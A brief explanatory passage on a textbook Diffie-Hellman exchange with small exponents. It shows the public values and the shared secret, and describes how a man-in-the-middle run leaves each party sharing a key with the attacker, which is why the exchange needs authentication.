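With the textbook exponents a=4 and b=3 the wire shows A=4 and B=10 and both sides compute the shared value 18; in the MITM run Alice's key equals Mallory's key with Alice and Bob's key equals Mallory's key with Bob, while Alice and Bob themselves disagree, which is why the exchange must be authenticated before the derived key is trusted.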